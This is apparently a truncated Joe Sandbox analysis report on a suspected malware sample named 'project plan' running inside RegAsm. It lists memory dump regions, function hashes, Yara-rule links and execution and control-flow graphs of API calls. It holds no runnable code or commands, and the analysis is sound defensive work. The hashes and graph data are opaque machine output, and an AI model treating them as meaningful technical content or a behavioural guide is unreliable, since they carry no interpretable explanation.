                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID: ConsoleFree
                                    • String ID:
                                    • API String ID: 771614528-0
                                    • Opcode ID: 6eaa60c4c9c0fb77eb12c7d2106fd06d23df99574dbea57c467bcd18f1199e37
                                    • Instruction ID: 3883d6897c2138dae8e2bee8bead2c201c07f7d94d34ab28fc461de8b7c71235
                                    • Opcode Fuzzy Hash: 6eaa60c4c9c0fb77eb12c7d2106fd06d23df99574dbea57c467bcd18f1199e37
                                    • Instruction Fuzzy Hash: 3331B33190C7588FDB14DFA8D849BEA7BF0EF56320F04426FD089C3552CB68A846CB51
                                    Function 00007FF848FF01AA Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A
                                    • API String ID: 0-3554254475
                                    • Opcode ID: fe9b3616fc7cd7a7e1fb903a94fe538070d25073208441abba347d636ab164bd
                                    • Instruction ID: 53b975eb6dc59013f804907e8e05609cf76423031001bce6721ce181d5c6b650
                                    • Opcode Fuzzy Hash: fe9b3616fc7cd7a7e1fb903a94fe538070d25073208441abba347d636ab164bd
                                    • Instruction Fuzzy Hash: 38813A3190CA8A8FDB56FB28C8656A47BE0FF95304F1801EFD54ACB1D7DB286846C745
                                    Function 00007FF848FF0ECD Relevance: .5, Instructions: 527COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58d51d221d7ad09490939acbcd2ea1e4b4cfc49a84695f6b8aa1b7cf42d3a3ef
                                    • Instruction ID: eec4699a742e5e34161ed72c83d84d47bc63eb5fd4a9a129a9c04a3f8ce88cd3
                                    • Opcode Fuzzy Hash: 58d51d221d7ad09490939acbcd2ea1e4b4cfc49a84695f6b8aa1b7cf42d3a3ef
                                    • Instruction Fuzzy Hash: 07F1F77280DAC64FE757EB2888551A4BFE0FF56240F0805FFD589CB1E2E718684AC395
                                    Function 00007FF848FF110B Relevance: .1, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172761086.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848ff0000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ebefd8aaffa0d7923b854b14dd75affb97c65072574926848ceda7003e777e4
                                    • Instruction ID: ff632657b2b8743db9f25f04ab694b9264e686c284b639f4e9e4989f01245607
                                    • Opcode Fuzzy Hash: 4ebefd8aaffa0d7923b854b14dd75affb97c65072574926848ceda7003e777e4
                                    • Instruction Fuzzy Hash: 6F41113590CA8D8FEB5AEF28C8954B8BBE0FF64340F1401BBD50AD71D5DB25A885C780

                                    Non-executed Functions

                                    Function 00007FF848F10F90 Relevance: .5, Instructions: 455COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2172486179.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ff848f10000_project plan.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 022d86c3a08cb5918bcc634ae0be2e21f8b53a1bf022e49094b54bbdaaa1327f
                                    • Instruction ID: e9cdf01be34ad4d4d0656a7d33f4d1d91377667697dd50a2c61a236f9d149329
                                    • Opcode Fuzzy Hash: 022d86c3a08cb5918bcc634ae0be2e21f8b53a1bf022e49094b54bbdaaa1327f
                                    • Instruction Fuzzy Hash: 28D12631A1DA8A4FD369EBA898515717BE0FF52350F1806BED09AC71D7DB29AC43C384

                                    Execution Graph

                                    Execution Coverage:15.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:28.9%
                                    Total number of Nodes:457
                                    Total number of Limit Nodes:2
                                    execution_graph 28153 f64cf0 28154 f64d02 28153->28154 28155 f64d85 KiUserExceptionDispatcher 28154->28155 28277 f67e49 28155->28277 28156 f64d93 28282 f68e97 28156->28282 28286 f68f10 28156->28286 28157 f64d9a 28290 f693e0 28157->28290 28158 f64da1 28294 f69841 28158->28294 28159 f64da8 28298 f69ca1 28159->28298 28160 f64daf 28302 f6a100 28160->28302 28161 f64db6 28306 6143a70 28161->28306 28311 6143a60 28161->28311 28162 f64dbd 28316 6143ec8 28162->28316 28321 6143eb9 28162->28321 28163 f64dc4 28326 6144310 28163->28326 28331 6144320 28163->28331 28164 f64dcb 28336 6144778 28164->28336 28341 6144768 28164->28341 28165 f64dd2 28346 6144bd0 28165->28346 28351 6144bc1 28165->28351 28166 f64dd9 28356 6145018 28166->28356 28361 6145028 28166->28361 28167 f64de0 28366 6145470 28167->28366 28371 6145480 28167->28371 28168 f64de7 28376 61458d8 28168->28376 28381 61458c8 28168->28381 28169 f64dee 28386 6145d30 28169->28386 28391 6145d2b 28169->28391 28170 f64df5 28396 6146188 28170->28396 28401 614617b 28170->28401 28171 f64dfc 28406 61465d4 28171->28406 28411 61465e0 28171->28411 28172 f64e03 28416 6146a38 28172->28416 28421 6146a29 28172->28421 28173 f64e0a 28426 6146e90 28173->28426 28431 6146e80 28173->28431 28174 f64e11 28436 61472d8 28174->28436 28441 61472e8 28174->28441 28175 f64e18 28446 6147740 28175->28446 28451 6147733 28175->28451 28176 f64e1f 28456 6147b98 28176->28456 28461 6147b88 28176->28461 28177 f64e26 28466 6147ff0 28177->28466 28471 6147fe3 28177->28471 28178 f64e2d 28476 6148448 28178->28476 28481 6148438 28178->28481 28179 f64e34 28486 6148897 28179->28486 28491 61488a0 28179->28491 28180 f64e3b 28496 6148ce9 28180->28496 28501 6148cf8 28180->28501 28181 f64e42 28506 6149150 28181->28506 28511 6149140 28181->28511 28182 f64e49 28516 614e850 28182->28516 28521 614e840 28182->28521 28183 f64e76 28526 614f013 28183->28526 28531 614f028 28183->28531 28184 f64e84 28536 614f480 28184->28536 28541 614f470 28184->28541 28185 f64e8b 28546 614f8c9 28185->28546 28552 614f8d8 28185->28552 28186 f64e92 28557 6160040 28186->28557 28562 6160006 28186->28562 28187 f64e99 28567 6160488 28187->28567 28572 6160498 28187->28572 28188 f64ea0 28577 61608e0 28188->28577 28583 61608f0 28188->28583 28189 f64ea7 28588 6161748 28189->28588 28593 6161739 28189->28593 28190 f64eb5 28598 6161b8f 28190->28598 28603 6161ba0 28190->28603 28191 f64ebc 28608 6161ff8 28191->28608 28613 6161fe9 28191->28613 28192 f64ec3 28618 6162440 28192->28618 28623 6162450 28192->28623 28193 f64eca 28628 6162898 28193->28628 28633 61628a8 28193->28633 28194 f64ed1 28638 6162cf1 28194->28638 28643 6162d00 28194->28643 28195 f64ed8 28648 6163148 28195->28648 28653 6163158 28195->28653 28196 f64edf 28658 61635b0 28196->28658 28664 61635a0 28196->28664 28197 f64ee6 28278 f67e7a 28277->28278 28670 f688c0 28278->28670 28674 f688b0 28278->28674 28279 f67f2a 28279->28156 28283 f68ea5 28282->28283 28284 f688c0 LdrInitializeThunk 28283->28284 28285 f69060 28284->28285 28285->28157 28287 f68fb2 28286->28287 28288 f688c0 LdrInitializeThunk 28287->28288 28289 f69060 28288->28289 28289->28157 28291 f69412 28290->28291 28292 f688c0 LdrInitializeThunk 28291->28292 28293 f694c0 28292->28293 28293->28158 28295 f6984d 28294->28295 28296 f688c0 LdrInitializeThunk 28295->28296 28297 f69920 28296->28297 28297->28159 28299 f69cd2 28298->28299 28300 f688c0 LdrInitializeThunk 28299->28300 28301 f69d80 28300->28301 28301->28160 28303 f6a132 28302->28303 28304 f688c0 LdrInitializeThunk 28303->28304 28305 f6a1e0 28304->28305 28305->28161 28307 6143a92 28306->28307 28309 f688c0 LdrInitializeThunk 28307->28309 28310 f688b0 LdrInitializeThunk 28307->28310 28308 6143b40 28308->28162 28309->28308 28310->28308 28312 6143a70 28311->28312 28314 f688c0 LdrInitializeThunk 28312->28314 28315 f688b0 LdrInitializeThunk 28312->28315 28313 6143b40 28313->28162 28314->28313 28315->28313 28317 6143eea 28316->28317 28319 f688c0 LdrInitializeThunk 28317->28319 28320 f688b0 LdrInitializeThunk 28317->28320 28318 6143f98 28318->28163 28319->28318 28320->28318 28322 6143eea 28321->28322 28324 f688c0 LdrInitializeThunk 28322->28324 28325 f688b0 LdrInitializeThunk 28322->28325 28323 6143f98 28323->28163 28324->28323 28325->28323 28327 6144320 28326->28327 28329 f688c0 LdrInitializeThunk 28327->28329 28330 f688b0 LdrInitializeThunk 28327->28330 28328 61443f0 28328->28164 28329->28328 28330->28328 28332 6144342 28331->28332 28334 f688c0 LdrInitializeThunk 28332->28334 28335 f688b0 LdrInitializeThunk 28332->28335 28333 61443f0 28333->28164 28334->28333 28335->28333 28337 614479a 28336->28337 28339 f688c0 LdrInitializeThunk 28337->28339 28340 f688b0 LdrInitializeThunk 28337->28340 28338 6144848 28338->28165 28339->28338 28340->28338 28342 6144778 28341->28342 28344 f688c0 LdrInitializeThunk 28342->28344 28345 f688b0 LdrInitializeThunk 28342->28345 28343 6144848 28343->28165 28344->28343 28345->28343 28347 6144bf2 28346->28347 28349 f688c0 LdrInitializeThunk 28347->28349 28350 f688b0 LdrInitializeThunk 28347->28350 28348 6144ca0 28348->28166 28349->28348 28350->28348 28352 6144bf2 28351->28352 28354 f688c0 LdrInitializeThunk 28352->28354 28355 f688b0 LdrInitializeThunk 28352->28355 28353 6144ca0 28353->28166 28354->28353 28355->28353 28357 6145028 28356->28357 28359 f688c0 LdrInitializeThunk 28357->28359 28360 f688b0 LdrInitializeThunk 28357->28360 28358 61450f8 28358->28167 28359->28358 28360->28358 28362 614504a 28361->28362 28364 f688c0 LdrInitializeThunk 28362->28364 28365 f688b0 LdrInitializeThunk 28362->28365 28363 61450f8 28363->28167 28364->28363 28365->28363 28367 6145480 28366->28367 28369 f688c0 LdrInitializeThunk 28367->28369 28370 f688b0 LdrInitializeThunk 28367->28370 28368 6145550 28368->28168 28369->28368 28370->28368 28372 61454a2 28371->28372 28374 f688c0 LdrInitializeThunk 28372->28374 28375 f688b0 LdrInitializeThunk 28372->28375 28373 6145550 28373->28168 28374->28373 28375->28373 28377 61458fa 28376->28377 28379 f688c0 LdrInitializeThunk 28377->28379 28380 f688b0 LdrInitializeThunk 28377->28380 28378 61459a8 28378->28169 28379->28378 28380->28378 28382 61458d8 28381->28382 28384 f688c0 LdrInitializeThunk 28382->28384 28385 f688b0 LdrInitializeThunk 28382->28385 28383 61459a8 28383->28169 28384->28383 28385->28383 28387 6145d52 28386->28387 28389 f688c0 LdrInitializeThunk 28387->28389 28390 f688b0 LdrInitializeThunk 28387->28390 28388 6145e00 28388->28170 28389->28388 28390->28388 28392 6145d30 28391->28392 28394 f688c0 LdrInitializeThunk 28392->28394 28395 f688b0 LdrInitializeThunk 28392->28395 28393 6145e00 28393->28170 28394->28393 28395->28393 28397 61461aa 28396->28397 28399 f688c0 LdrInitializeThunk 28397->28399 28400 f688b0 LdrInitializeThunk 28397->28400 28398 6146258 28398->28171 28399->28398 28400->28398 28402 6146188 28401->28402 28404 f688c0 LdrInitializeThunk 28402->28404 28405 f688b0 LdrInitializeThunk 28402->28405 28403 6146258 28403->28171 28404->28403 28405->28403 28407 61465e0 28406->28407 28409 f688c0 LdrInitializeThunk 28407->28409 28410 f688b0 LdrInitializeThunk 28407->28410 28408 61466b0 28408->28172 28409->28408 28410->28408 28412 6146602 28411->28412 28414 f688c0 LdrInitializeThunk 28412->28414 28415 f688b0 LdrInitializeThunk 28412->28415 28413 61466b0 28413->28172 28414->28413 28415->28413 28417 6146a5a 28416->28417 28419 f688c0 LdrInitializeThunk 28417->28419 28420 f688b0 LdrInitializeThunk 28417->28420 28418 6146b08 28418->28173 28419->28418 28420->28418 28422 6146a38 28421->28422 28424 f688c0 LdrInitializeThunk 28422->28424 28425 f688b0 LdrInitializeThunk 28422->28425 28423 6146b08 28423->28173 28424->28423 28425->28423 28427 6146eb2 28426->28427 28429 f688c0 LdrInitializeThunk 28427->28429 28430 f688b0 LdrInitializeThunk 28427->28430 28428 6146f60 28428->28174 28429->28428 28430->28428 28432 6146e90 28431->28432 28434 f688c0 LdrInitializeThunk 28432->28434 28435 f688b0 LdrInitializeThunk 28432->28435 28433 6146f60 28433->28174 28434->28433 28435->28433 28437 61472e8 28436->28437 28439 f688c0 LdrInitializeThunk 28437->28439 28440 f688b0 LdrInitializeThunk 28437->28440 28438 61473b8 28438->28175 28439->28438 28440->28438 28442 614730a 28441->28442 28444 f688c0 LdrInitializeThunk 28442->28444 28445 f688b0 LdrInitializeThunk 28442->28445 28443 61473b8 28443->28175 28444->28443 28445->28443 28447 6147762 28446->28447 28449 f688c0 LdrInitializeThunk 28447->28449 28450 f688b0 LdrInitializeThunk 28447->28450 28448 6147810 28448->28176 28449->28448 28450->28448 28452 6147740 28451->28452 28454 f688c0 LdrInitializeThunk 28452->28454 28455 f688b0 LdrInitializeThunk 28452->28455 28453 6147810 28453->28176 28454->28453 28455->28453 28457 6147bba 28456->28457 28459 f688c0 LdrInitializeThunk 28457->28459 28460 f688b0 LdrInitializeThunk 28457->28460 28458 6147c68 28458->28177 28459->28458 28460->28458 28462 6147b98 28461->28462 28464 f688c0 LdrInitializeThunk 28462->28464 28465 f688b0 LdrInitializeThunk 28462->28465 28463 6147c68 28463->28177 28464->28463 28465->28463 28467 6148012 28466->28467 28469 f688c0 LdrInitializeThunk 28467->28469 28470 f688b0 LdrInitializeThunk 28467->28470 28468 61480c0 28468->28178 28469->28468 28470->28468 28472 6147ff0 28471->28472 28474 f688c0 LdrInitializeThunk 28472->28474 28475 f688b0 LdrInitializeThunk 28472->28475 28473 61480c0 28473->28178 28474->28473 28475->28473 28477 614846a 28476->28477 28479 f688c0 LdrInitializeThunk 28477->28479 28480 f688b0 LdrInitializeThunk 28477->28480 28478 6148518 28478->28179 28479->28478 28480->28478 28482 6148448 28481->28482 28484 f688c0 LdrInitializeThunk 28482->28484 28485 f688b0 LdrInitializeThunk 28482->28485 28483 6148518 28483->28179 28484->28483 28485->28483 28487 61488c2 28486->28487 28489 f688c0 LdrInitializeThunk 28487->28489 28490 f688b0 LdrInitializeThunk 28487->28490 28488 6148970 28488->28180 28489->28488 28490->28488 28492 61488c2 28491->28492 28494 f688c0 LdrInitializeThunk 28492->28494 28495 f688b0 LdrInitializeThunk 28492->28495 28493 6148970 28493->28180 28494->28493 28495->28493 28497 6148cee 28496->28497 28499 f688c0 LdrInitializeThunk 28497->28499 28500 f688b0 LdrInitializeThunk 28497->28500 28498 6148dc8 28498->28181 28499->28498 28500->28498 28502 6148d1a 28501->28502 28504 f688c0 LdrInitializeThunk 28502->28504 28505 f688b0 LdrInitializeThunk 28502->28505 28503 6148dc8 28503->28181 28504->28503 28505->28503 28507 6149154 28506->28507 28509 f688c0 LdrInitializeThunk 28507->28509 28510 f688b0 LdrInitializeThunk 28507->28510 28508 6149220 28508->28182 28509->28508 28510->28508 28512 6149154 28511->28512 28514 f688c0 LdrInitializeThunk 28512->28514 28515 f688b0 LdrInitializeThunk 28512->28515 28513 6149220 28513->28182 28514->28513 28515->28513 28517 614e872 28516->28517 28519 f688c0 LdrInitializeThunk 28517->28519 28520 f688b0 LdrInitializeThunk 28517->28520 28518 614e920 28518->28183 28519->28518 28520->28518 28522 614e848 28521->28522 28524 f688c0 LdrInitializeThunk 28522->28524 28525 f688b0 LdrInitializeThunk 28522->28525 28523 614e920 28523->28183 28524->28523 28525->28523 28527 614f01c 28526->28527 28529 f688c0 LdrInitializeThunk 28527->28529 28530 f688b0 LdrInitializeThunk 28527->28530 28528 614f0f8 28528->28184 28529->28528 28530->28528 28532 614f029 28531->28532 28534 f688c0 LdrInitializeThunk 28532->28534 28535 f688b0 LdrInitializeThunk 28532->28535 28533 614f0f8 28533->28184 28534->28533 28535->28533 28537 614f481 28536->28537 28539 f688c0 LdrInitializeThunk 28537->28539 28540 f688b0 LdrInitializeThunk 28537->28540 28538 614f550 28538->28185 28539->28538 28540->28538 28542 614f474 28541->28542 28544 f688c0 LdrInitializeThunk 28542->28544 28545 f688b0 LdrInitializeThunk 28542->28545 28543 614f550 28543->28185 28544->28543 28545->28543 28548 614f8cc 28546->28548 28547 614f880 28547->28186 28548->28547 28550 f688c0 LdrInitializeThunk 28548->28550 28551 f688b0 LdrInitializeThunk 28548->28551 28549 614f9a8 28549->28186 28550->28549 28551->28549 28553 614f8d9 28552->28553 28555 f688c0 LdrInitializeThunk 28553->28555 28556 f688b0 LdrInitializeThunk 28553->28556 28554 614f9a8 28554->28186 28555->28554 28556->28554 28558 6160041 28557->28558 28560 f688c0 LdrInitializeThunk 28558->28560 28561 f688b0 LdrInitializeThunk 28558->28561 28559 6160110 28559->28187 28560->28559 28561->28559 28563 6160019 28562->28563 28565 f688c0 LdrInitializeThunk 28563->28565 28566 f688b0 LdrInitializeThunk 28563->28566 28564 6160110 28564->28187 28565->28564 28566->28564 28568 61604ba 28567->28568 28570 f688c0 LdrInitializeThunk 28568->28570 28571 f688b0 LdrInitializeThunk 28568->28571 28569 6160568 28569->28188 28570->28569 28571->28569 28573 61604ba 28572->28573 28575 f688c0 LdrInitializeThunk 28573->28575 28576 f688b0 LdrInitializeThunk 28573->28576 28574 6160568 28574->28188 28575->28574 28576->28574 28579 61608e4 28577->28579 28578 6160898 28578->28189 28579->28578 28581 f688c0 LdrInitializeThunk 28579->28581 28582 f688b0 LdrInitializeThunk 28579->28582 28580 61609c0 28580->28189 28581->28580 28582->28580 28584 61608f1 28583->28584 28586 f688c0 LdrInitializeThunk 28584->28586 28587 f688b0 LdrInitializeThunk 28584->28587 28585 61609c0 28585->28189 28586->28585 28587->28585 28589 6161749 28588->28589 28591 f688c0 LdrInitializeThunk 28589->28591 28592 f688b0 LdrInitializeThunk 28589->28592 28590 6161819 28590->28190 28591->28590 28592->28590 28594 616173c 28593->28594 28596 f688c0 LdrInitializeThunk 28594->28596 28597 f688b0 LdrInitializeThunk 28594->28597 28595 6161819 28595->28190 28596->28595 28597->28595 28599 6161b98 28598->28599 28601 f688c0 LdrInitializeThunk 28599->28601 28602 f688b0 LdrInitializeThunk 28599->28602 28600 6161c70 28600->28191 28601->28600 28602->28600 28604 6161ba1 28603->28604 28606 f688c0 LdrInitializeThunk 28604->28606 28607 f688b0 LdrInitializeThunk 28604->28607 28605 6161c70 28605->28191 28606->28605 28607->28605 28609 6161ff9 28608->28609 28611 f688c0 LdrInitializeThunk 28609->28611 28612 f688b0 LdrInitializeThunk 28609->28612 28610 61620c8 28610->28192 28611->28610 28612->28610 28614 6161fec 28613->28614 28616 f688c0 LdrInitializeThunk 28614->28616 28617 f688b0 LdrInitializeThunk 28614->28617 28615 61620c8 28615->28192 28616->28615 28617->28615 28619 6162444 28618->28619 28621 f688c0 LdrInitializeThunk 28619->28621 28622 f688b0 LdrInitializeThunk 28619->28622 28620 6162520 28620->28193 28621->28620 28622->28620 28624 6162451 28623->28624 28626 f688c0 LdrInitializeThunk 28624->28626 28627 f688b0 LdrInitializeThunk 28624->28627 28625 6162520 28625->28193 28626->28625 28627->28625 28629 616289c 28628->28629 28631 f688c0 LdrInitializeThunk 28629->28631 28632 f688b0 LdrInitializeThunk 28629->28632 28630 6162978 28630->28194 28631->28630 28632->28630 28634 61628a9 28633->28634 28636 f688c0 LdrInitializeThunk 28634->28636 28637 f688b0 LdrInitializeThunk 28634->28637 28635 6162978 28635->28194 28636->28635 28637->28635 28639 6162cf4 28638->28639 28641 f688c0 LdrInitializeThunk 28639->28641 28642 f688b0 LdrInitializeThunk 28639->28642 28640 6162dd0 28640->28195 28641->28640 28642->28640 28644 6162d01 28643->28644 28646 f688c0 LdrInitializeThunk 28644->28646 28647 f688b0 LdrInitializeThunk 28644->28647 28645 6162dd0 28645->28195 28646->28645 28647->28645 28649 616314c 28648->28649 28651 f688c0 LdrInitializeThunk 28649->28651 28652 f688b0 LdrInitializeThunk 28649->28652 28650 6163228 28650->28196 28651->28650 28652->28650 28654 6163159 28653->28654 28656 f688c0 LdrInitializeThunk 28654->28656 28657 f688b0 LdrInitializeThunk 28654->28657 28655 6163228 28655->28196 28656->28655 28657->28655 28659 61635b1 28658->28659 28662 f688c0 LdrInitializeThunk 28659->28662 28663 f688b0 LdrInitializeThunk 28659->28663 28678 f68ca4 28659->28678 28660 6163680 28660->28197 28662->28660 28663->28660 28665 61635a4 28664->28665 28667 f68ca4 LdrInitializeThunk 28665->28667 28668 f688c0 LdrInitializeThunk 28665->28668 28669 f688b0 LdrInitializeThunk 28665->28669 28666 6163680 28666->28197 28667->28666 28668->28666 28669->28666 28673 f688f1 28670->28673 28671 f68a51 28671->28279 28672 f68de2 LdrInitializeThunk 28672->28671 28673->28671 28673->28672 28675 f688c0 28674->28675 28676 f68a51 28675->28676 28677 f68de2 LdrInitializeThunk 28675->28677 28676->28279 28677->28676 28681 f68b5b LdrInitializeThunk 28678->28681 28680 f68dfa 28680->28660 28681->28680 28682 616f6b0 28683 616f6f6 28682->28683 28687 616f882 28683->28687 28691 616f890 28683->28691 28684 616f7e3 28688 616f890 28687->28688 28694 616f28c 28688->28694 28692 616f28c DuplicateHandle 28691->28692 28693 616f8be 28692->28693 28693->28684 28695 616f8f8 DuplicateHandle 28694->28695 28696 616f8be 28695->28696 28696->28684

                                    Executed Functions

                                    Function 061407C8 Relevance: 3.7, Strings: 1, Instructions: 2432COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K
                                    • API String ID: 0-856455061
                                    • Opcode ID: 6e698f4d76f7b8c323a359c9743382cb70839067597d0e5fec35a23c7a7795df
                                    • Instruction ID: dae2e90c98b582f7f85a0403676555f17611d05d846b304e91dbe68f6f379022
                                    • Opcode Fuzzy Hash: 6e698f4d76f7b8c323a359c9743382cb70839067597d0e5fec35a23c7a7795df
                                    • Instruction Fuzzy Hash: 86430630D146198EDB51EF68C854AEDFBB1FF99300F50D69AE45867221EB70AAC4CF81
                                    Function 00F688C0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2131 f688c0-f688ef 2132 f688f6-f6898c call f65a60 2131->2132 2133 f688f1 2131->2133 2136 f68a2b-f68a31 2132->2136 2133->2132 2137 f68a37-f68a4f 2136->2137 2138 f68991-f689a4 2136->2138 2139 f68a63-f68a76 2137->2139 2140 f68a51-f68a5e 2137->2140 2141 f689a6 2138->2141 2142 f689ab-f689fc 2138->2142 2144 f68a7d-f68a99 2139->2144 2145 f68a78 2139->2145 2143 f68dfa-f68ef7 2140->2143 2141->2142 2159 f689fe-f68a0c 2142->2159 2160 f68a0f-f68a21 2142->2160 2150 f68eff-f68f09 2143->2150 2151 f68ef9-f68efe call f65a60 2143->2151 2147 f68aa0-f68ac4 2144->2147 2148 f68a9b 2144->2148 2145->2144 2155 f68ac6 2147->2155 2156 f68acb-f68afd 2147->2156 2148->2147 2151->2150 2155->2156 2165 f68b04-f68b46 2156->2165 2166 f68aff 2156->2166 2159->2137 2162 f68a23 2160->2162 2163 f68a28 2160->2163 2162->2163 2163->2136 2168 f68b4d-f68b56 2165->2168 2169 f68b48 2165->2169 2166->2165 2170 f68d7f-f68d85 2168->2170 2169->2168 2171 f68b5b-f68b80 2170->2171 2172 f68d8b-f68d9e 2170->2172 2173 f68b87-f68bbe 2171->2173 2174 f68b82 2171->2174 2175 f68da5-f68dc0 2172->2175 2176 f68da0 2172->2176 2184 f68bc5-f68bf7 2173->2184 2185 f68bc0 2173->2185 2174->2173 2177 f68dc7-f68ddb 2175->2177 2178 f68dc2 2175->2178 2176->2175 2181 f68de2-f68df8 LdrInitializeThunk 2177->2181 2182 f68ddd 2177->2182 2178->2177 2181->2143 2182->2181 2187 f68c5b-f68c6e 2184->2187 2188 f68bf9-f68c1e 2184->2188 2185->2184 2191 f68c75-f68c9a 2187->2191 2192 f68c70 2187->2192 2189 f68c25-f68c53 2188->2189 2190 f68c20 2188->2190 2189->2187 2190->2189 2195 f68c9c-f68c9d 2191->2195 2196 f68ca9-f68ce1 2191->2196 2192->2191 2195->2172 2197 f68ce3 2196->2197 2198 f68ce8-f68d4a 2196->2198 2197->2198 2203 f68d51-f68d75 2198->2203 2204 f68d4c 2198->2204 2207 f68d77 2203->2207 2208 f68d7c 2203->2208 2204->2203 2207->2208 2208->2170
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf2b88c9006d3f8135c5b0733700d60af64f248e52d38f9161956d506d43a0ba
                                    • Instruction ID: 4c4b146a64a757c4ac2de30bac5368e14daef683822f9a4872d9f883983fb4aa
                                    • Opcode Fuzzy Hash: bf2b88c9006d3f8135c5b0733700d60af64f248e52d38f9161956d506d43a0ba
                                    • Instruction Fuzzy Hash: 7DF1E574D01218CFDB14DFA9D884B9DBBB2BF88304F54C2A9E808AB355DB749986DF50
                                    Function 061495A8 Relevance: .7, Instructions: 745COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db3fa4ed901ec794146afdb866060a9d6d21b1fda0e8dca8c9a92c223e4d098b
                                    • Instruction ID: 0318776762306f285e3eca2524c5f0a367e2a6be3744925b7216824470d9d4f6
                                    • Opcode Fuzzy Hash: db3fa4ed901ec794146afdb866060a9d6d21b1fda0e8dca8c9a92c223e4d098b
                                    • Instruction Fuzzy Hash: 78827C74E012288FDB65DF69DD84B9DBBB2BF88300F1085EA984DA7265DB345E81CF40
                                    Function 0614DAE8 Relevance: .7, Instructions: 693COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 37a146d9ed26c9a0899d2834ebf359643d14d22f766dd2a2f29e5a5cf46d83f8
                                    • Instruction ID: 96d2e46ff489005a008ece3ebcd84bf8ac72f908566d62d61a3661bc9dec1161
                                    • Opcode Fuzzy Hash: 37a146d9ed26c9a0899d2834ebf359643d14d22f766dd2a2f29e5a5cf46d83f8
                                    • Instruction Fuzzy Hash: BF827A74E012298FDB65DF69CD94BD9BBB2BF88300F1481E9A44DA7265DB349E81CF40
                                    Function 00F66DDF Relevance: .7, Instructions: 678COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42fbcdc13c12f612bac5d9a9e3456cdb498089db3d57274db273c4fa1d55a7f7
                                    • Instruction ID: b01e3cfa80fdb7997d0502f8e260c06f33760e063cb3e405c644b53abadfff20
                                    • Opcode Fuzzy Hash: 42fbcdc13c12f612bac5d9a9e3456cdb498089db3d57274db273c4fa1d55a7f7
                                    • Instruction Fuzzy Hash: 1A62DD74E052288FDB24DF69C884BDDBBB2BB49305F2085E9D808A7355DB30AE81DF50
                                    Function 0614CDE8 Relevance: .7, Instructions: 677COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ec41bc59faa07ec3e3f3117602d57136c3f2f934574c6e204da3ef1356cc4f2e
